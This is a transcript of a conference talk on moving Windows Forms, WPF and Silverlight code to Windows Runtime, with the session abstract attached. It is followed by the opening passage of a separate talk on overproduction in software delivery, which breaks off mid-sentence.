Silverlight is dead because Microsoft is no longer investing in Silverlight, right? I mean, is that not the reason? We're all scared to use Silverlight because Microsoft is not putting money into the future of Silverlight. So the question I have to ask you is how much money do you think Microsoft is putting into the future of VPF? Nothing. They have one or two developers keeping it running, right? They're doing maintenance on it, just like they are with Silverlight. How many developers do you think Microsoft has working on Windows forms? A couple. Maybe two or three. And here's the real question for you. When did Microsoft stop investing in Windows forms? When was the last time Windows forms got major new features and was enhanced in any important way? Hmm? 2005. So Windows forms has been dead for eight years, and yet all of you are still using it. So why be afraid of Silverlight? I'm not trying to convince you to go to Silverlight. I'm just trying to impress upon all of you that this idea that Silverlight is dead or that VPF is dead, does this really matter? It has a 10-year commitment. Once they ship a platform, they continue to make it work for 10 years. So Windows forms ships in Windows 8. So you can continue to do Windows forms for another 10 years. Congratulations. Are you thrilled? If you're doing VPF, the same thing is true. Of course, if you're doing Silverlight, Silverlight ships in Windows 8 also, and so you've got another 10 years of Silverlight. So my point is that all three technologies are in the same position. So the question then is why are you interested in going to the Windows runtime, or even maybe what is the Windows runtime? So Windows 8 really represents two different programming models or two different platforms in one. It represents the Win32.net platform, and it also represents this new Windows runtime platform, or WinRT. The Win32 platform only works on Intel-based computers. Also my laptop, which is running an Intel CPU, can run the Win32 side and the WinRT. But if you have an ARM-based tablet, a Windows 8 computer that has an ARM chip, it can only run the new Windows runtime code. So this is the big difference. So the diagram that you see on the screen represents the Windows 8 operating system, showing all of the Win32 components in blue and all of the new Windows runtime components in green, and they're all, both are present on any Intel-based computer. So the way that I think about Windows 8, especially on an Intel computer, is it's just a slightly faster version of Windows 7, plus it has the Windows runtime. When Windows 8 first came out, someone asked me if I thought that Microsoft would ever allow the Windows runtime programs to work on Windows 7. And I said, yes, you just have to upgrade to Windows 8. No? That was a joke. All right, moving on. If you do Windows Forms today, the good news is that Windows Forms exists in Windows 8 on the desktop side. Also, if you do WPF or Silverlight, those technologies exist also in Windows 8. So there's no immediate need to worry about changing or upgrading or, right, there's no pressure. Even if your company or organization upgrades to Windows 8, your applications almost certainly will continue to work. But if you are going to start developing in the new Windows runtime platform, and you're coming from a.NET world, right, so you're coming from Windows Forms, VPF, or Silverlight, the most likely place that you will end up is in the.NET version or.NET environment inside of the Windows runtime. Now the Windows runtime supports three different programming models. You can program in C++ using XAML or C++ with DirectX, but C++ is one of them. You can program in.NET, so you can use Csharp or Visual Basic and XAML, and you can write software that will run in the Windows runtime, or you can use HTML and JavaScript and write software that will run in the Windows runtime. And I'm only going to today really talk about the.NET perspective, because if you're coming from.NET, I assume that you would like to reuse some of your code and reuse some of your assets. And so as you move into the Windows runtime, you'll probably want to bring along as much of your Csharp or VB code, and if you already are using XAML, as much of your XAML as you can, right? I think that's a fair assumption. So this graphic shows kind of the migration picture, depending on where you start from. Like I said, all of the current smart client technologies just work inside of Windows 8. And so as long as your users are using Intel-based computers, then you have no particular reason to do any sort of upgrade, at least not soon. But if you want to go to the green side and you start, well, first of all, notice there is no diagram, no line, from Windows Forms into the green side. That's because most Windows Forms applications, and you can tell me if yours is different, but most Windows Forms applications have a lot of code behind click events and lost focus events and other UI events, right? Most Windows Forms have a lot of code behind the user interface, and most Windows Forms applications use datasets and data tables. The combination of those two technologies means that little or none of your existing Windows Forms code, if that's the way you build your applications, none of that code will move forward. Probably is very sad news, but that is the way this works. If you are using VPF, some of your code might come forward. Certainly your skills will come forward. Your knowledge of XAML, your understanding of the new data types like the observable collection, things that were introduced with VPF, those are all valid in WinRT. But I draw a red line because most, in my experience, most VPF applications are written in a way that they talk directly to the database. They're two-tier applications. Those won't carry forward. You have to be at least three-tier. A lot of VPF applications are written just like Windows Forms, where they use a lot of code behind the pages. There's a lot of event handlers behind the XAML. If you've written a lot of code in event handlers behind the XAML, then you have the same problem as in Windows Forms, where it's going to be hard to move that code forward. Also, unfortunately, VPF allowed you to use the dataset. So there's some VPF programs in the world, not a lot, but there are some that use the dataset or data table, and those will have a hard time moving forward. But the good news is that if you've written your VPF applications that are using three-tier or service-oriented architecture and you do not use the dataset, then you're probably going to be able to move some of your code forward. If you're starting with Silverlight, like the one gentleman sitting up on the top row or near the top row, great for you. Silverlight is extremely similar to the Windows runtime. In fact, I often think about or talk about the Windows runtime as kind of being Silverlight version 6. The Windows runtime is a sandboxed environment, just like Silverlight. It requires a three-tier or service-oriented architecture, just like Silverlight. It requires all server communications be asynchronous, just like Silverlight. And so if you've already gone through the work of learning Silverlight, it's not that WinRT is the same, but it's extremely similar. You've already worked through or learned the hard lessons. So when WinRT came out, there was a lot of rumor and discussion about how it really didn't support.NET. Yes, you can use C-sharp, but it's not actually.NET. Has anyone heard that? Is that something you've heard? Well, have you ever heard of this thing called duck typing? If I give you an object or an interface and it looks like a duck and it quacks like a duck, then it must be a duck. So the.NET code in WinRT looks like.NET. It quacks like.NET. So how can you tell me that it's not.NET? It's true. Microsoft created a new runtime for.NET in Windows runtime because it's essentially almost like a new operating system. But you still have C-sharp and C-sharp is the same. You still have the standard system libraries, so all of the basic data types that are in C-sharp and those are the same. And you have a lot of the basic, all the things necessary to write business logic in.NET are the same in WinRT. The things that are different are things that don't even exist in Windows runtime. For example, if you use enterprise services, right, ComPlus, that does not exist in WinRT, so that API is gone. There's no API in Windows runtime to create a web server. It's a client operating system. Why would you ever create a web server running on someone's desktop? So it's true that there's a lot of things from.NET that are not in WinRT, but that's because.NET is a server-side operating system and it's a client-side operating system or runtime. Yes? Right. So this gentleman is pointing out that there are other things not in Windows runtime that are in full.NET such as reflection.emit, which is widely used by especially mocking frameworks and some other tools like that. And part, so in fact, the.NET framework, not C-sharp, this is the base class library for.NET framework, has something like 20,000 APIs. In Overlight has something like 3,000 APIs. Windows runtime has something like 1,500. Just to give you an idea of what's missing. But I think that you have to understand two things. One, the Windows runtime is designed to be a client-side operating system that runs in a secure sandbox that makes it extremely difficult for someone to create malicious or bad code. And this is not an accident. Right? How many of you have iPads? Right? Several? When you download an app from the store and onto your iPad, do you worry about getting a virus? Do you run an antivirus program on your iPad? No. No one worries about this. Do you run antivirus on your Windows computer? When you go to the Internet and you download a program, do you worry that it might not be a real program, but it might in fact be a virus? Right? How many of you have Android devices? How many of you run antivirus on your Android devices? Really? Oh, you are so naive. Right? Most people that I know run antivirus on their Android tablets because the Google Play Store is pretty safe, but there are other places that you can get Android applications that are in fact viruses. And that's because Google has not done as good of a job as Apple or now Microsoft in making sure that it's really hard to write bad code. And by bad, I mean malicious, dangerous, right? Viruses or Trojan horses. And so, yes, the missing reflection emit is bad. Maybe they will add some parts of it at some point in the future, but right now, I think they look at it as being too dangerous. Right? And their primary concern is that they want Windows 8 to be as safe as an iPad. And I think for all of us, for instance, my kids are sitting at the top row, and I'm going to pick on them since they're here, but one of them had a school assignment where he had to create an audio recording. And so, he went and downloaded an open source product called Audacity, which allows you to record audio and edit that audio. And then he had to convert that into an MP3. And so, he went and, on my instructions, he went and downloaded an MP3 encoder. But when you Google for this encoder, the first entry that you get back from Google is not the real encoder, it's a virus. And so, of course, when he installed this encoder, he had picked the first one, which looked like a real website. It ran an installer that looked like a real installer, and it was a horrible virus. Right? I mean, we can't continue to live like this. Personally, the faster that we all get off from Windows and onto either an iPad or Windows RT, the happier I will be, at least as a father. Sorry, Marcus. So when you're programming in the Windows Forms, you understand all of the controls in Windows Forms, and perhaps you've purchased third-party controls from Telerik or Infragistics, and you learn all of these controls. And then if you move to VPF, you have to go learn a whole new set of controls. Right? So they're similar, but they're not the same. And if you go to Silverlight, you have to learn a whole new set of controls that are similar but not the same. So when you go to the Windows Runtime, you should expect that you'll have to learn a whole new set of controls that are similar but not the same. Right? This is, I think, only to be expected. What is different about the Windows Runtime, and what I think is really exciting, is that in Windows Forms, all of the controls are written in.NET. They're not operating system-level controls. They're not Windows controls. They're.NET controls. And in VPF, all of the controls are.NET controls, and the same is true in Silverlight. So they're not operating system-level controls. They're abstractions on top, and so they have performance issues sometimes, and they are not necessarily consistent with every application on the operating system. Right? The list box or a button will look a little bit different or act a little bit different from a real button. In Windows Runtime, the list of controls on the screen are available to you, and they are operating system-level controls. And these are some of the most common controls that are used to build Windows itself, and also are controls that you will almost certainly use when you build your applications. And I don't have time in this talk to go through and show you examples of all of them, but let me show you just some of the controls and how they're used just in normal applications inside of Windows. For example, suppose that you want to show a list of items and have it work with the keyboard and the mouse and with touch. And suppose that you would like those list of items maybe to have images and then be able for the user to click on them. This is the start screen in Windows 8. This start screen is created using a grid view control. You have access to the grid view control. So all of the behaviors that you see here in terms of rapidly scrolling, if I can get my mouse to work, rapidly scrolling back and forth, being able to select items or being able to just click on an item and have it give you a click event, are all available to you. And because it is the operating system-level control that Microsoft is using and you have access to the same control, your application will look and feel the same as every other Windows application to an end user. So this is good. It reduces training for the user, but it also means that your application will be consistent with the rest of Windows and it means that your application will tend to be faster than if this was a control created by the.NET team instead of by Windows itself. If I run the finance app, we can see some other controls. So first of all, the finance app is a side-scrolling application with different types of content. This is also a grid view control. So this is the same control used to create the start screen, but it's styled differently so that it shows different size tiles in different groups. If I look at a specific news item, now I'm in some sort of a text viewing control, but if you look closely off to the side over here, you can see that there's-where's my mouse? There it is. You can see that there's kind of an arrow that appears and I can span or scroll through content. This control is called a flip view control and it flips through views. No surprise. But again, this is a control that you have access to. And in order to use it, you just have a collection of content or a collection of objects and you bind it to the flip view and it does all of the work of rendering it and it does all of the work of animating the transitions so that you don't have to worry about that. It just does the right thing. Up here is a back button. This back button is not part of the operating system. It is part of the actual application. So it's just a button and it's using a special glyph or graphic to get the arrow. But the code behind this button is one line of code and that's because built into the Windows runtime is a navigation framework. So every time that you-your application wants to show a new page or a new form, you use the navigation framework and say navigate to this new form. The great thing is that the navigation framework keeps track of where you were so that behind this button, there's one line of code that says navigation.go back. And it goes back to where I was. So again, inside of your code, you don't have to worry about those details because the operating system is helping you do that or the runtime. If we look at the weather app, this is similar where it's using a top-level grid view control. But here, there's too much content to fit. This is the detail hourly forecast for where we live in Minnesota. And as you can see, the current weather is raining and cloudy. But now this scrolling up and down could be a list box control, but it's not. It's actually something called a list view control. And it's-the list view control is an operating system list control that understands how to scroll. Vertically, nor-usually it's vertical, but you can restyle it because this is XAML after all. The last thing that I will point out, or maybe not the last, but moving on, on this screen, they use something called semantic zoom. And so here, I'm looking at this list of programs, and this can get quite long if you install a lot of software and just let it throw the tiles onto your screen. So maybe you want to get a kind of a big picture view. And so this is using a control called semantic zoom. A semantic zoom control is a single control that just has two different views, a zoomed in view and a zoomed out view. And all you have to do is define the XAML for the zoomed in view and the XAML for the zoomed out view, and the control does the rest of the work as the user interacts with it. All of these controls-so I'm using a mouse, but all of these controls work with touch as well, so it's a pinch or a zoom type motion. And you might say, well, but Rocky, that's a visual zoom. This just made it bigger. Right? So let me show you another example. Here I am in the weather application, and there's a lot of different kinds of information in this weather application. If I use semantic zoom, now it completely changes the display to just say, OK, you zoomed out. Here are the big categories of information available in this application. And so now if I say that I would like to see maps, it'll just bring me to the map part of the display. So it's not a visual zoom. It's not like you're zooming in closer to an image. It's changing between two different views, and it's really up to you as a developer or a designer to think about if the user zooms out, what would you like to show them to make it easy for them to navigate between parts of your application? Let's see. What else? The one last thing that I think I need to show you is that when I'm in an application, and I went with a touch, I either swipe down onto the screen from the top or swipe up from the bottom or use the right mouse button, I get what's called an app bar. And this is really the replacement for the tool bar that you would find in Windows Forms or VPF. The app bar has two parts, a top app bar and a bottom app bar. You can use either or both. So this application uses both. If you follow Microsoft's design recommendations or guidelines, they recommend that the top app bar be used for big navigation. So if you're creating a text editor, each open document would probably be a tab across the top of the app bar. Or if you're running Skype and having multiple conversations, each conversation will be across the top of the app bar. The bottom app bar should be used for more what you would think of as a tool bar approach. So this one only has one icon for help, because there's only so much that you can do in this application. But the idea is that over here on this side of the app bar, you will have icons that give the user the ability to interact with the current view on the screen. And over on the right-hand side, you'll have buttons that allow the user to interact with the application as a whole. Right, so not necessarily the current view. Excuse me. Uh-oh. So there are a couple other controls here that I'm not going to take the time to show, but I'll talk about briefly. And that is that there's a web viewer, which is basically Internet Explorer 10 that you can embed into your application. You have access to the operating system's native progress bar and progress ring. Those, even though it seems so simple, to me are a great thing, because what application doesn't use some sort of progress indicator, and every application seems to invent their own, like in VPF, and so they never look the same. Here they can all look the same, they'll follow the color schemes set by the user for their operating system, and so it'll give the user a more consistent behavior. The Windows runtime at its core is actually built on top of something called COM3. Now a lot of you may, some of you might not have ever heard of COM, or some of you remember COM as being that thing from the 1990s that we escaped by going to.NET. Well it's back. The good news is that Microsoft is using something called a projection, so they take the runtime operating system and wrap it with extremely thin.NET classes. So when we're interacting with the operating system, we think we're just talking completely in the.NET world. And this is different, again, at this point somebody might say, well, oh, well then that's no good, because.NET is a wrapper over the top of Windows, I should just go program C++. I don't know if anybody actually says that, I mean really who wants to program in C++. But, sorry Marcus, there too my son learned C++, and now I'm telling him he wasted his time. So moving on, the thing is that these lightweight projections are really extremely thin. And so, like the list box control in VPF is actually a control written in VPF that behind the scenes makes calls into the underlying Windows graphics engine, right? The list view control in WinRT is in fact the Windows operating systems list view. All they did is create a.NET friendly class that has properties and methods that directly map into the properties and methods of the control. So there's a very large difference between something that abstracts the operating system like VPF and something that just wraps it with a super thin layer like we have in WinRT. WinRT has a new application model, and I'll talk about this in a little bit, but it's important I think, and this is one of the biggest things you have to understand moving from Windows forms or VPF where the application is either running or it's not running. And you go into the Windows runtime where applications might be running, they might be suspended or they might be not running. So there's actually a whole new mode for your application which is that it could be in memory but not running. So it's suspended. I'll talk about that in a little bit more detail. And the other big area that will cause a lot of challenge for most developers is the amount of asynchronous programming that is required. I mentioned earlier that in Silverlight, Microsoft said that all server-side calls had to be asynchronous. Anyone want to guess why that is the case? Well, Silverlight was designed to run in the browser, and almost all of the browsers only run on one thread. So if your Silverlight application, which is using that one thread for the whole browser, makes a call to the server, right, it calls a web service, and it blocks. It's a synchronous call, right, then that thread becomes blocked. And what happens to the browser? It becomes blocked. So the user can't even switch to a different tab in Chrome because Chrome itself is going to be completely blocked. And Microsoft could not allow that to happen because if they did, then Silverlight would get a very bad reputation very fast. And so they said, in order to make sure that all of us as developers don't accidentally start locking up everyone's browser, they made a rule that the only APIs for talking to the network were asynchronous. And so that was hard, right, the gentleman that does Silverlight. That might have been a, for most of us, it was a substantial learning curve to figure out how to do asynchronous programming. In Windows 8, Microsoft is really trying to compete with the iPad and with the Android tablets. And for those of you who have iPads, when you're moving around and interacting with your iPad, does it ever lock up? No, not really. I mean, if it does, it's very rare, right? It doesn't even glitch, usually. In other words, when I'm swiping through a list of items, it's very, very rare for a tablet to just kind of freeze even for a part of a second. Because users see that, right? As they're swiping with their finger, if the graphics underneath the screen and their fingers stop being in sync, the user sees that right away. And so with Windows 8, Microsoft wanted to make sure they had an operating system that worked well with tablets and with touch and was competitive with something like the iPad. Well they can do as much as they want to in the operating system, but if your code or my code freezes up the application, then the entire operating system looks bad, right? I mean, we might know the difference. I might be able to say, oh, that's not Windows. That's my bad programming. But to the end user, it's all Windows, right? They don't see the difference between the operating system and your application. And so Microsoft made a rule that said, as they created the API for the Windows runtime, anything that can take longer than 50 milliseconds, that's 5-0 milliseconds, which is a very short period of time, anything that could take longer than 50 milliseconds will be an asynchronous API. So think about what that means, right? Talking to the hard drive easily takes longer than 50 milliseconds, talking to the network, talking to the camera, talking to the microphone, talking to the user. If you bring up a dialogue that requires the user to click or tap or interact, users never can respond within 50 milliseconds, so even bringing up a dialogue box has to be asynchronous. And so this requires a pretty substantial way of rethinking because most of us, especially in Windows forms and VPF, are used to just making method calls and everything is synchronous. And yes, when I talk to the database, the application freezes, but the user can live with it. That's always been kind of our mentality as developers. And now Microsoft is on the side of the users and is saying, you know what, enough of that. The users hate it when applications freeze. We'll make it really hard for you guys as developers to create essentially bad applications or bad user experiences. So far, everything that I've said to me seems positive. And I'll revisit some of those in a little bit more detail, but in the middle of this talk, I need to give you what I think is the bad news. Before I do that, I have to ask you, how many of you are planning to use Windows 8 or the Windows runtime to create consumer applications, things like games or small apps that maybe do Twitter or things not for business, but just for end users? So one, two, three. So Microsoft is with you three. When they thought about how to deploy winRT applications, the first thing they did is they figured out a really pretty good store solution. So if you're trying to build applications for anybody in the world, or at least anybody in Norway or Europe or whatever you want, you're going to submit them to the Microsoft store. Microsoft will run that application through a series of tests to try and make sure that you don't have any malicious code or that your application doesn't just fail completely. Microsoft doesn't care if your application is actually any good. They don't care if it's useful. They just care if it's damaging. And so if you look already on the Microsoft store, just like on the Apple store, there are already hundreds, if not thousands, of horrible apps. And you can spend your money buying all of these horrible apps, but at least you know that they will not harm your computer. They just waste your money. Not to say that you three are going to create horrible apps. Don't do that, please. But the rest of you are probably going to build applications that are for people inside of your organization. Is that true? For your customers, for your employees, something like that. And so you're probably not going to try and deploy through the Microsoft public store, because if I've written an application that manages my internal inventory or allows me to enter account information for my customers, I really don't want anybody on the planet to be able to run my application. And so then I probably want a private store. Microsoft currently has a very limited story around the private store. This is the disappointing news. And then as the slide goes on to point out, you can also deploy for development and testing. That's a pretty good story. And you can deploy on the Win32 side, just like you always have, using ClickOnce or using MSIs or any of today's technologies. But here's what happens if you want to do a private store. It's a two-step process. Step one is that you have to unlock your computers for side loading. What this means is that by default, when you get a Windows 8 computer or tablet, it's not possible to put your own applications onto that machine. There's a licensing block that prevents you from installing applications onto your own computer. Now if you are a developer with Visual Studio, the first time you try to open up a Windows store project in Visual Studio, you will get a dialogue from Visual Studio prompting you to get a developer key. And those are free, and they last for one to three months. In my workshop yesterday, I said three, because mine lasts for three. But a couple people in the class said theirs were only good for one month. So maybe I'm special. I don't know. But these keys are free, and they will give them to you to unlock your computer so that you can do your own debugging. So then suppose that I build an application, and I want all of you to install it, and you don't have Visual Studio. Well the first thing that we have to do is unlock your computers. And this table shows for the different versions of Windows 8 how much that will cost. So if you have a Surface RT or some other ARM-based Windows 8 machine, it will cost you $30 to unlock your device. If you have a Windows Pro machine, which most of us as developers probably have Windows Pro, it will cost you an extra $30 US to unlock it. If you have Windows 8 Enterprise, and you are not joined to a domain, then it will cost you $30. And if you have Windows 8 Enterprise, and you are joined to a domain, then it's free, because it's part of your domain license. The one that I skipped is Windows 8, not Pro or not Enterprise. What I always think of as Windows 8 Home, it's the kind of Windows 8 that most people buy when they go to an electronics store to buy a home computer. Those devices cannot be unlocked. So most people's home computers will never be able to side load or run your business apps. Everybody happy with this? Do you like this story? Yes? I like it very much, because what are we going to do with the VPS, for example, legacy applications that want to move to the Windows 8 home? How do we move about that? Legacy applications, like Windows Forms? VPS. Sorry? WPF. Oh, VPS. But see, VPS applications run on Win32, and so they're not affected. This is only to unlock for the new Windows runtime platform. But if you want to use touchy, that's the stuff. I understand. Right? Remember, I don't work for Microsoft, right? So don't throw things at me. Or what is it? Don't shoot the messenger, right? But it gets worse, I'm afraid, because I say $30 per device, but you can only buy these keys in a pack of 100. So the minimum cost is $3,000 US dollars. So if you have a small company with maybe 10 employees, you still have to spend $3,000 to unlock all 10 of your devices. Now I don't like this story. I think this is really bad. And I've done a lot of blogging about this, and I've talked to many people at Microsoft, and I've tried to convince them that they're wrong. And so all I can do is tell everyone the way that it is, and then all we can do is try and tell Microsoft that we don't like it, right? Because it's not good. The thing is that once you have unlocked your computer, you can install as many applications as you want to. This is a one-time fee per device. Yes. You can still, if the computer is an Intel-based computer, you can continue to install Win32 apps, like VPF, Windows Forms, even Silverlight, on Windows 8 at no additional cost. But if you want to use the new WinRT programming model, then you have to pay extra, right? If you create a WinRT application, like today you just start up and create a new WinRT application, it will not run in desktop mode. It will only run in WinRT. Because it's a, and maybe I wasn't real clear, but the blue and the green slide with the Win32 and the whole Windows runtime, they really are like two different operating systems. If you write a program in Win32, that program cannot see or interact with a program running in Windows runtime. And if you create a Windows runtime program, it cannot see or interact with any programs running in Win32. They're completely separate. I think that one of the biggest problems is that if you continue to create a WinRT application, you don't have the ability to create Windows 7. In our company, our customers experience a lot of XP. I mean, it takes five to ten years. Right. You're not, yeah. You're jumping to the end of my talk. So, all right. So one more thing on this slide, and that is I said it was a two-step process. Step one is to unlock your devices, right? That's what costs the $30 per device. Once you've unlocked my device, it's unlocked forever, but that key is non-transferrable. So if it's my device, my personal device, and I leave your organization and go to another organization, my device remains unlocked. All right. So these keys are used one time, and they're not transferrable. But then you still have to actually deploy the application. And there's really two ways to deploy WinRT applications. One of them is using Microsoft's product called Intune, which is a product you buy from Microsoft that gives you a corporate store or a private store. And Intune costs either six, eight, or eleven dollars per device per month. That's the price for this tool. And there are three different versions of Intune. So it depends on the price can be different. So I saw you guys laughing. This is also maybe not a great story. So if you don't want to pay for that extra cost, the second option for deploying applications is that you can run PowerShell scripts to do the deployment. And one of the people at Microsoft I was talking to suggested that the best way to maybe do this is to put the application on a USB thumb drive and have a low-paid employee like an intern maybe go to every device to do the installation. You might remember this as being something called sneaker net in the mid-1990s. Is that a term in Europe where someone would run around with their sneakers to do all of the installing? Yeah? Right. So apparently some of the people in Microsoft still think that it's 1994. You can, of course, put that PowerShell script on a shared file server inside of your company. So that's maybe a little better. Microsoft just announced that in Windows 8.1, which is the next version that's coming before the end of this year, they're going to open up some of their APIs so that third parties so other companies can create some products to compete with Intune. And so maybe that will make this a better story. So Windows Forms, when you go to develop, you use Visual Basic, you use C-Sharp, you use the Windows Forms designer, and then probably your data is either in a data set or a data table or maybe it's in some.NET objects. If you do VPF, it's pretty much the same except that instead of Windows Forms and its proprietary form designer, you can use XAML. Silverlight is basically the same except that Silverlight does not support the data set. So there's no data set and no data table. How many of you use data sets or data tables? So those of you who raised your hand, you're going to have to move off from the data set and data table onto the use of objects and collections. And that's because Silverlight and WinRT are the same and that there is no data set and there is no data table. And so everything is based on the use of objects. So your primary areas of concern as you move forward or look at how do I use WinRT, today if you do not use XAML, you should start learning XAML. The closest type of XAML is Silverlight, but VPF is pretty close too. Basically if you use VPF as though it were Silverlight, you'll learn the right kind of XAML. The history of this, and I'm not going to have enough time to go into it in depth, but VPF came first and Microsoft tried a lot of really interesting things and discovered that some of the more advanced features in VPF were too hard for most people to figure out. And so when they created Silverlight, they took away the parts that most people struggled with and they added in some other parts that were simpler. And when they created WinRT, they really copied Silverlight pretty much as they created the WinRT version of XAML. And so if you use some of the most advanced XAML in VPF, then you're going to have trouble going forward. But if you're using something very similar to Silverlight XAML, it'll probably be very similar and some of it can even be copied and pasted into a WinRT project. Data access. In Windows Forms and in VPF, most applications talk directly to the database. There are two-tier application. In Silverlight and in WinRT, there is no data access API. There is no system.data. You have to call a web service or a WCF, I guess VCF service, in order to get your data from an application server. Now if you already use an application server, you're in perfect shape. Your service will probably continue to work as long as it's not returning data sets, because there is no data set. Data binding in WinRT is XAML binding. And so if you use data binding or XAML binding in VPF or Silverlight, it's the same in WinRT. If you do Windows Forms, you might or might not use data binding. Right? There are some of us, like myself, really worked hard to learn and make Windows Forms data binding productive. Other people, like my good friend Billy Hollis, said this is too much work and he never used Windows Forms data binding. But when you go to XAML, you really have to use data binding. There's no real option here. I already talked about the asynchronous behaviors. I talked about the sandbox. I talked about navigation. I do want to talk briefly if my slide will advance. There we go. Okay, I talked about that. I want to talk about the application lifecycle. This is also very important, because in Windows Forms or VPF, the user starts your application, your application runs, and then the user closes your application and it's gone. And as long as the application is running, it can do anything. It's always working. Even if it's not visible, if the user minimizes the application or hides it behind another window, it's still running, right? But in WinRT, only the application that's visible to the user is actually running. And so when I'm looking at the stock app, this app is currently running because it's visible on the screen. And if I switch to the weather app, now the weather app is running because it's current on the screen. And what happened to the stock or finance app? It is suspended, which means that it's still in memory, but it's not getting any CPU time. None. It also means that right now, if the computer starts to run out of memory, it might just get rid of the stock app. And you won't be notified. It just clears it out of memory to recover the memory. It's also the case that the user could go over to the sidebar, find the stock app, and they can right click and say close, and it just went away. And that finance app was not notified that it was going away. So what this means is that as you develop WinRT applications, you have to think that your application is in only one of two states. You get an on launched event when the application starts, and that allows you to start up and do work. And then at some point, your application will become suspended. And the way you have to think about this is that you may never come back from being suspended. So when you get the on suspended event, you have to save any data that actually matters. Because from being suspended, you can be terminated, and you won't know that you were terminated. You can be terminated because the operating system ran out of memory, or because the user closed your application, or because the user shut down the machine. And so Microsoft has events built into the platform to make this possible or easy, well, manageable, but it's definitely a new concept. So I have exactly four seconds left, but I want to close this talk by suggesting this. WinRT is version one. And as such, I think it's going to take some time.
|
So you have a big investment in Windows Forms or WPF, but it is clear that the future of the Windows smart client is the Windows Runtime (WinRT). What strategies can you use to salvage at least some of your existing code over the next few years? It does help if you are already using XAML in WPF or Silverlight , but there are still differences moving to WinRT. In this session you’ll learn about those differences and get the information you need to start getting your code ready for the future.
|
10.5446/51501 (DOI)
|
Okay, through this microphone thingy. Hands up if you can't hear me. If I sit down. All these ask questions where people don't move. Yeah, good afternoon. Russ Miles, I'm here in Oslo for the first time in my life. I'm very pleased to be invited. And I'm just biding time now. Really, I'm trying to just waste a bit of time until we can lock the doors because I do want to say at first thanks for coming to this talk. I'm competing with Uncle Bob. That can't be easy. And also, let's be honest, the title of the talk probably didn't endear itself wonderfully to you at first glance. Who here is a developer? Thank you for coming to a talk that says you're not only a developer. Originally, when I wrote the talk down, I said, you're not a developer. And I thought, no one's going to come to that one. So I softened it a touch by putting the word only in there. And I could have easily have called it something different. I could have come up with a different name such as don't fear the change agent. Because this talk is going to be a little bit odd. I noticed on the program that it talks about this talk being inside the buckets of agile and architecture. Sort of true. But I also want to do a little bit more than just agile and architecture. Who's seen me speak before? Anywhere, online, offline, in different line. Okay. Russ Miles, I help teams deliver valuable software frequently, pretty much. I do that using simplicity as much as possible. So I have some principles that I apply. But this talk isn't about necessarily a specific set of guidelines for building architecture or writing code, which is my usual talk series. This is more about the approach I take to building software. To doing anything with the teams that I work with. So what I'd like you to do, if you don't mind, I want some enthusiasm in the room, which is not easy at 420 on the first day. I'd like you to buy in a little bit into the idea of changing the world just a touch. I'm not talking about a complete groundswell. I'm talking about a small shift. But a small shift in thinking, which is not an easy thing to achieve. And I would just like to push you gently in this direction, if you will, for the next 40-odd minutes, if I get my timings right. And the reason I want to push you in a direction is because there are a number of endemic ills to our profession at the moment. So you don't want to shout out any problems they still see in software delivery today. We've just had gone 10 years now of agile processes and frameworks and tooling and expertise. We've had many, many decades now of our profession. Do you want to suggest any particular ailments that they see in their software delivery process that they keep encountering any suggestions from the floor? Estimating is a veritable nightmare. It's a real guessing. Yes, absolutely. Why is estimating a problem? Why is estimating itself a problem generally, do you think? It's an absolute nightmare. There are several reasons why estimation is a challenge. Estimation at least is a challenge because as you build software, it gets slower to build software. As you build the software that you had yesterday, tends to hold you back a little bit today and it increases. So factoring that in alone, which is somewhat a natural endemic problem of what we do, is very tricky even with experience. So as John pointed out, the experience helps with estimating. Estimating is certainly one area that I believe we need to give some attention, should we say. There's one other area that I'd like to really hit today and it's a weird one because it wouldn't have been the first one on our minds about 10 or 12 years ago if someone had asked you what's the problem with what we do. Why aren't we delivering what people want or whatever the problem was bit would be. This problem is almost a new problem to us because we've now managed to make the engine work. A lot of the clients I work with have teams that are starting to deliver. So the original challenge that I used to be given was can you help these teams deliver something. A very large organization that I worked with, they, I don't think I might be sharing this, they had a budget of 60 million a year for just their IT. And they'd spent five years and they delivered nothing. That's a lot of money by anyone's grab I think. So that was the problem I used to get maybe 12 years ago. I still get it sometimes now. But the problem of can you help us deliver something please is being slightly replaced now with this particular demon. Which is we are producing something but it's not what people want. We've managed to make the engine function and now the hose pipe is on and we're drowning in what we don't want. So this talk is about this problem. And I'd like to just give an example, a story if you will. So in the past when I've given this talk people don't necessarily have an agreed definition of what overproduction is. And there's lots of very good academic definitions. But the one I like to use is I think brings it home. Who here is married or in a significant relationship with someone? Cool. Okay. So married or not significant relationship. You come home. You notice that your partner is a little bit techy tonight. You don't know why. So what do you do? If you've got children you make sure they're quiet and they fed and they go to bed. You maybe do a bath for him or her. You maybe tidy up. You start to scrabble for ideas. You're doing loads of things to try to in some way lighten her or his mood. You light the candles. You choose the movie. You cook the food. You get the picture. At the end of the evening he or she turns around and says, why didn't you ask me how I was when you came in? And that was all you had to do. You have overproduced on a grand scale. That to me, anyone ever ask what is overproduction? That little story runs through my head of trying to do everything. Let's be honest, you're doing loads, but you're doing the wrong thing. Those of you who don't know me, I tend to like to tell stories about the work that I do with my different clients. I love doing that. They're not so keen sometimes. But that's the way it goes. I'd like to start with a confession as a consultant. This is not an easy confession for me to do. The idea being I was brought into a large organisation in order to help their teams get themselves set up, forming and delivering. Day one, turn up, I meet the teams. The people are great. The people are experienced. They've got the skills. They've got the passion. All of the things that Uncle Bob talks about, they've absorbed it and they're doing it. Everything that Dan North talks about, they've absorbed it. They're doing it. They're abandoning some of these things because they don't work for them, which is great. They're even thinking for themselves on these things. That's wonderful. The people are good. I wonder maybe the team needs a bit of work, but no, the teams formed quite well. They all get on very well. Worse, they appear to be delivering software. What am I there for? I have a moment of insecurity. I think maybe they don't understand the problem. Turns out the problem is well defined. I'm talking to the business. The business say, well, we've got this process. It's about 10 minutes long. We've got hundreds of people doing it. It's a ridiculous process that they do. They have to go to multiple systems to get a simple answer, and then they can action it based on that answer. They can make a decision. That seems well understood. What's the software being created to do? That process collapses it down as much as possible so that we don't have to have all these people doing this job all the time. We would rather these people do something else with their lives. At this point, I'm sitting there thinking this is great for them. But for me, what am I supposed to fix here? Because everything seems to be pretty good. Everyone understands there's a lot of collaboration going on with the business. Everything looks reasonable. They've got a roadmap. They've got a plan for the future. They've got another two years worth of development effort. At each stage, they reckon they can break this process down to roughly eventually one minute. I speak to my stakeholder now. I tend to be an honest person most of the time. I say, what am I here for? I'm sorry. I'm not cheap. What am I here to do? I don't do gigs where I turn up and just handhold people and say, you're doing things fine. I like to be somewhere where there's a challenge. She said, okay, how about you go and look at the business? If last chance, go and see the users and see what they're doing. Maybe get 